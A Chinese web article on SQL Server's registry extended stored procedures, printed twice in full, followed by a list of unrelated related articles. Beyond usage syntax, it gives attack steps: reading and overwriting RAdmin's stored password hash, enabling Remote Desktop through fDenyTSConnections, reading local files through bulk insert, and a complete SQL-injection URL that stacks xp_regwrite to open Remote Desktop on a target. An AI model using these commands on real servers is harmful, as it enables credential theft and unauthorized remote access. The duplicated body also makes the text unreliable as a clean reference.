幾個(gè)擴(kuò)展存儲(chǔ)過(guò)程使用方法
更新時(shí)間:2010年07月25日 21:10:09 作者:
sqlserver里面有一些危險(xiǎn)的擴(kuò)展存儲(chǔ)過(guò)程,可以操作注冊(cè)表,所以很多情況下,下面的存儲(chǔ)過(guò)程為了服務(wù)器安全都會(huì)將這些存儲(chǔ)過(guò)程刪除。不過(guò)防御與安全同等重要。下面是具體的注冊(cè)的操作方法。
SQL Server中包含了幾個(gè)可以訪問(wèn)系統(tǒng)注冊(cè)表的擴(kuò)展存儲(chǔ)過(guò)程.但實(shí)際上這幾個(gè)擴(kuò)展存儲(chǔ)過(guò)程是未公開(kāi)的,從sql server 7.0就有了,
在SQL server 2000中仍然保留,他們以后可能會(huì)刪除.但是這幾個(gè)存儲(chǔ)過(guò)程卻提供了在當(dāng)前的SQL Server版本中訪問(wèn)系統(tǒng)注冊(cè)表的能力,
而且很多人利用SQL Server來(lái)進(jìn)行攻擊系統(tǒng)時(shí),往往都會(huì)用到這幾個(gè)擴(kuò)展存儲(chǔ)過(guò)程.所以最好在SQL Server中禁用他們.
xp_regenumvalues 以多個(gè)記錄集方式返回所有鍵值
使用方法:
xp_regenumvalues 注冊(cè)表根鍵, 子鍵
比如說(shuō),想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有鍵值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
xp_regread 返回制定鍵的值
使用方法:
xp_regread 根鍵,子鍵,鍵值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密碼
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
遠(yuǎn)程桌面開(kāi)啟為0
xp_regwrite 寫(xiě)入注冊(cè)表
使用方法:
xp_regwrite 根鍵,子鍵, 值名, 值類(lèi)型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必須清空后再寫(xiě)新數(shù)值
修改成功的前提是值為空
注意值類(lèi)型有2種REG_SZ 表示字符型,相當(dāng)于新建字符串值,REG_DWORD 表示整型,相當(dāng)于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用遠(yuǎn)程桌面
xp_regdeletevalue 刪除某個(gè)值
使用方法:
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
xp_regdeletekey 刪除鍵,包括該鍵下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
運(yùn)行前提SA
可能用處不是很大,也沒(méi)深入研究,因?yàn)橛X(jué)得讀asp用xp_makecab更方便點(diǎn),僅供思維擴(kuò)展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
開(kāi)啟遠(yuǎn)程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--
在SQL server 2000中仍然保留,他們以后可能會(huì)刪除.但是這幾個(gè)存儲(chǔ)過(guò)程卻提供了在當(dāng)前的SQL Server版本中訪問(wèn)系統(tǒng)注冊(cè)表的能力,
而且很多人利用SQL Server來(lái)進(jìn)行攻擊系統(tǒng)時(shí),往往都會(huì)用到這幾個(gè)擴(kuò)展存儲(chǔ)過(guò)程.所以最好在SQL Server中禁用他們.
xp_regenumvalues 以多個(gè)記錄集方式返回所有鍵值
使用方法:
xp_regenumvalues 注冊(cè)表根鍵, 子鍵
比如說(shuō),想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有鍵值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
xp_regread 返回制定鍵的值
使用方法:
xp_regread 根鍵,子鍵,鍵值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密碼
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
遠(yuǎn)程桌面開(kāi)啟為0
xp_regwrite 寫(xiě)入注冊(cè)表
使用方法:
xp_regwrite 根鍵,子鍵, 值名, 值類(lèi)型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必須清空后再寫(xiě)新數(shù)值
修改成功的前提是值為空
注意值類(lèi)型有2種REG_SZ 表示字符型,相當(dāng)于新建字符串值,REG_DWORD 表示整型,相當(dāng)于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用遠(yuǎn)程桌面
xp_regdeletevalue 刪除某個(gè)值
使用方法:
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
xp_regdeletekey 刪除鍵,包括該鍵下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
運(yùn)行前提SA
可能用處不是很大,也沒(méi)深入研究,因?yàn)橛X(jué)得讀asp用xp_makecab更方便點(diǎn),僅供思維擴(kuò)展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
開(kāi)啟遠(yuǎn)程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--
相關(guān)文章
SQL Server利用sp_spaceused如何查看表記錄存在不準(zhǔn)確的情況
這篇文章主要給大家介紹了關(guān)于SQL Server利用sp_spaceused如何查看表記錄存在不準(zhǔn)確情況的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用SQL Server具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2019-04-04
淺述SQL Server的語(yǔ)句類(lèi)別 數(shù)據(jù)庫(kù)范式 系統(tǒng)數(shù)據(jù)庫(kù)組成
本文著重講解了SQL語(yǔ)句的組成以及數(shù)據(jù)庫(kù)的三個(gè)范式,對(duì)系統(tǒng)數(shù)據(jù)庫(kù)的組成進(jìn)行簡(jiǎn)短的介紹。有興趣的朋友可以看下2016-12-12
揭秘SQL Server 2014有哪些新特性(2)-固態(tài)硬盤(pán) Buffer Pool(緩沖池) 擴(kuò)展
SQL Server 2014 中引入的緩沖池?cái)U(kuò)展提供數(shù)據(jù)庫(kù)引擎緩沖池的非易失性隨機(jī)存取內(nèi)存(即固態(tài)硬盤(pán))擴(kuò)展的無(wú)縫集成,從而顯著提高 I/O 吞吐量。 那么今天我們來(lái)探究下,這個(gè)功能到底如何強(qiáng)悍吧2014-08-08
Sql Server中常用的6個(gè)自定義函數(shù)分享
這篇文章主要介紹了Sql Server中常用的6個(gè)自定義函數(shù)分享,本文包含提取數(shù)字、提取英文、提取中文、過(guò)濾重復(fù)字符等函數(shù),需要的朋友可以參考下2014-10-10
向數(shù)據(jù)庫(kù)中插入數(shù)據(jù)并返回當(dāng)前插入的行數(shù)及全局變量@@IDENTITY應(yīng)用
向數(shù)據(jù)庫(kù)中插入數(shù)據(jù)并返回當(dāng)前插入的的行數(shù),這項(xiàng)功能很實(shí)用的可以判斷是否為批量插入主要是利用全局變量@@IDENTITY實(shí)現(xiàn),感興趣的朋友可以了解下啊,希望本文對(duì)你鞏固sql知識(shí)很有幫助的2013-01-01
dbeaver配置SQL?server連接實(shí)現(xiàn)
本文主要介紹了dbeaver配置SQL?server連接實(shí)現(xiàn),文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2023-07-07

